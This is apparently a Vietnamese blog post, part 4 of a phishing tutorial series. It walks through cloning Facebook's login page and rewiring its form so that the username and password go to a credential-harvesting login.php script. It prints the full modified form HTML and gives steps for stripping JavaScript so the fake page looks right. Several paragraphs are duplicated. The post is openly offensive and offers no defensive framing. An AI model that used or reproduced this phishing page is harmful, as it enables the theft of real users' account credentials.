[ Phần 2 ] : Viết chương trình - Chạy thử
[ Phần 3 ] : Đưa chương trình ra phạm vi Internet .
[ Phần 4 ] : Nâng cao - Xây dựng giao diện giống các mạng xã hội .
Ở phần 1 . Chúng ta đã tìm hiểu về nguyên tắc hoạt động , phần 2 đã viết và phần 3 đã đưa nó ra Internet . Và bây giờ , phần cuối đó là xây dựng giao diện đúng chuẩn cho việc Phishing . Việc xây dựng giao diện fake thì không đòi hỏi có quá nhiều kiến thức về ngôn ngữ Web bởi vì đơn giản là ta chỉ cần đi copy lại và chỉnh lại mốt số cái " cần " và " nhất định " phải chỉnh lại thôi .
Trên thực tế thì các bạn có thể tìm thấy kha khá các giao diện fake được chia sẻ trên Internet , nhưng dù sao thì cũng hãy biết một chút về việc tạo fake giao diện này .
Việc xây dựng lại một fake trên giao diện thật không phải là khó nhưng đòi hỏi các bạn cần làm nhiều để có thể tối ưu nhất . Tại sao ư , vì chúng ta đang tạo hàng fake nên không cần một số cái tính năng của hàng thật . Ví dụ đơn giản như ta fake trang đăng nhập của facebook thì ta chỉ cần cái dữ liệu người dùng nhập vào chứ đâu cần xác thực dữ liệu đó đúng hai sai , đơn giản là bởi vì ta đâu có biết được . 😂 . ( Cái đó cũng tùy vào mỗi người . Vì ta có thể xây dựng tiếp chương trình xác thực khi dữ liệu được gửi đến , và nếu có cơ hội ta sẽ cùng nghiên cứu sau . 😀 .
Trong bài viết này tôi sẽ lấy facebook để làm demo fake giao diện . Mà muốn hiểu trong bài này tôi nói gì thì hãy đọc lại bài hai phần viết chương trình nhé !
Trước hết ta cần xác định được trang cần fake. Ở đây tôi muốn fake trang đăng nhập của facebook . Giống như vậy :
Nếu các bạn không thấy rõ thì có thể xem tại link này : https://www.facebook.com/login/device-based/regular/login . Đó là link đăng nhập của facebook thật . Vậy trang đăng nhập ở link đó là trang mà tôi sẽ fake .
Truy cập vào link trên . Ta tiến hành bước tiếp theo trong quá trình fake . Có nhiều cách thao tác khác nhau như tải source về và sửa hoặc là sửa trực tiếp rồi tải source về sau hoặc khác . Nhưng trong bài viết này ta sẽ đi làm theo cách tải source về và chỉnh sửa . Để tải source về , thì ở trang đăng nhập của facebook các bạn nhấn Ctrl + U . Sau đó copy toàn bộ source code hiện ra và lưu trong file bất kì có đuôi .html . Ở đây tôi lưu trong file facebook.html . Nếu các bạn thắc mắc tại sao không chuột phải và chọn Save As . Thì , các bạn thích thì làm thôi , đó là sự sáng tạo .
Sau khi đã lưu source code xong . Các bạn kéo file đó vào trên thanh tab của trình duyệt để mở file đó lên .
Sau đó ta nhấn phím F12 hoặc nhấn tổ hợp Ctrl + Shift + I để mở chế độ dành cho nhà phát triển. Tại đây là nơi chúng ta sẽ bắt đầu thực hiện việc chỉnh sửa giao diện fake .
Sau đó ta nhấn phím F12 hoặc nhấn tổ hợp Ctrl + Shift + I để mở chế độ dành cho nhà phát triển. Tại đây là nơi chúng ta sẽ bắt đầu thực hiện việc chỉnh sửa giao diện fake .
Như bạn đã đọc ở phần hai thì , muốn dữ liệu được submit lên server thì cần phải có thẻ <form> cùng các thuộc tính khác . Vậy ở đây ta sẽ tìm đến thẻ <form> nơi mà người dùng sẽ nhập tài khoản và mật khẩu vào . Để đơn giản hơn so với việc phải lục nguyên cả một source code dài bát ngát , thì ta làm như sau :
Ok ! Sau khi đã tìm đến được thẻ <form> đó , hãy áp dụng những gì đã đọc trong phần hai. Sửa lại những gì có trong mục action lại và sửa trong mục name trong thẻ input . Ví dụ ở đây , tôi đã thay name trong phần nhập tên người dùng từ name='email' thành name='username' và ở mục nhập mật khẩu từ name='pass' thành name='password' để khớp với những gì đã viết trong file login.php ở phần 2 . Và kết quả là ta có code ở thẻ form của facebok như sau :
Ok ! Sau khi đã tìm đến được thẻ <form> đó , hãy áp dụng những gì đã đọc trong phần hai. Sửa lại những gì có trong mục action lại và sửa trong mục name trong thẻ input . Ví dụ ở đây , tôi đã thay name trong phần nhập tên người dùng từ name='email' thành name='username' và ở mục nhập mật khẩu từ name='pass' thành name='password' để khớp với những gì đã viết trong file login.php ở phần 2 . Và kết quả là ta có code ở thẻ form của facebok như sau :
<form id="login_form" action="login.php" method="post" onsubmit=""><input type="hidden" name="jazoest" value="2632" autocomplete="off"><input type="hidden" name="lsd" value="AVpNR0YH" autocomplete="off"><input type="hidden" autocomplete="off" id="error_box">
<div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value=""><input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value=""><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value=""><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="0"><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value=""><input type="hidden" autocomplete="off" id="return_session" name="return_session" value=""><input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value=""><input type="hidden" autocomplete="off" id="signed_next" name="signed_next" value=""><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1"><input type="hidden" autocomplete="off" name="timezone" value="-420" id="u_0_9"><input type="hidden" autocomplete="off" name="lgndim" value="eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzMyLCJjIjoyNH0=" id="u_0_a"><input type="hidden" name="lgnrnd" value="060348_rFrQ"><input type="hidden" id="lgnjs" name="lgnjs" value="1547301830">
<div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="username" id="email" tabindex="0" placeholder="Email hoặc số điện thoại" value="" autofocus="1" aria-label="Email hoặc số điện thoại"></div>
<div class="clearfix _5466 _44mg"><input type="password" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="password" id="pass" tabindex="0" placeholder="Mật khẩu" aria-label="Mật khẩu"></div>
<div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Đăng nhập</button></div>
<div class="_xkv fsm fwn fcg" id="login_link"><a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" id="forgot-password-link" target="">Quên tài khoản?</a><span role="presentation" aria-hidden="true"> · </span><a href="/r.php?locale=vi_VN&display=page" rel="nofollow" id="reg-link">Đăng ký Facebook</a></div>
</div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value=""><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source"><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type"><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source"><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type"><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false"><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false"><input type="hidden" autocomplete="off" name="ab_test_data" value="">
</form>Ok ! Bây giờ ta đã hoàn thành. Bước tiếp theo là lấy toàn bộ code đã thay đổi này rồi lưu lại vào file facebook.html đó và sử dụng nó , và cách dùng đã có ở phần 2 . Đối với các trang giao diện khác, các bạn làm tương tự, chỉ cần nắm được phần 2 là phần 4 này không có gì khó.
Làm thế nào để lưu lại source đã thay đổi ?
Lưu ý : Nếu muốn tối ưu như những gì tôi nói ở đầu bài, thì các bạn có thể xóa đi những code javascript không cần thiết trong source code của facebook. Chỉ javascript thôi nhé ! Đừng lỡ dại mà xóa CSS .
Vậy làm thế nào để biết code javascript nào là không cần thiết ?
Đơn giản :
Trong phần này không nói cụ thể mà chỉ nói lan man thôi . Lí do các bạn tự hiểu nhé ! 😊 .
Làm thế nào để lưu lại source đã thay đổi ?
- Chỉnh lại trong file facebook.html y chang như những gì đã chỉnh trên trình duyệt
- Tại phần chỉnh sửa code đang mở này . Các bạn kéo source lên và tìm đến thẻ <html> . Nó nằm trên cùng , dưới dòng <!doctype html> . Rồi nhấn chuột phải, chọn Edit as HTML . Copy lại toàn bộ và save lại vào file facebook.html
Lưu ý : Nếu muốn tối ưu như những gì tôi nói ở đầu bài, thì các bạn có thể xóa đi những code javascript không cần thiết trong source code của facebook. Chỉ javascript thôi nhé ! Đừng lỡ dại mà xóa CSS .
Vậy làm thế nào để biết code javascript nào là không cần thiết ?
Đơn giản :
- Mở file chứa code mà ta dùng để fake lên. Tức là file facebook.html
- Tìm và xóa tất cả các đoạn code có trong cặp thẻ và luôn cả cặp thẻ <script> .... code .... </script> . Làm lần lượt thôi nhé . Mỗi làn xóa xong một cặp thẻ như thế là save lại . Rồi chuyển sang bước 3
- Reset lại trang mà lúc nãy bạn kéo lên trình duyệt
- Nếu không có gì thay đổi về giao diện. Thì tiếp tục quay lại bước 1 . Nếu có thay đổi, quay lại bước 1 và nhấn Ctrl + Z để reset lại đoạn code vừa xóa. Sau đó thực hiện tiếp bước 2 với các đoạn code khác. À mà , javascript thì chủ yếu là chức năng chú ít khi giao diện lắm .
- Hết thì thôi
Trong phần này không nói cụ thể mà chỉ nói lan man thôi . Lí do các bạn tự hiểu nhé ! 😊 .
Video Thử Giao Diện
OK ! DONE
[ " Mọi chuyện buồn kia cũng qua thôi " ]
OK ! DONE
[ " Mọi chuyện buồn kia cũng qua thôi " ]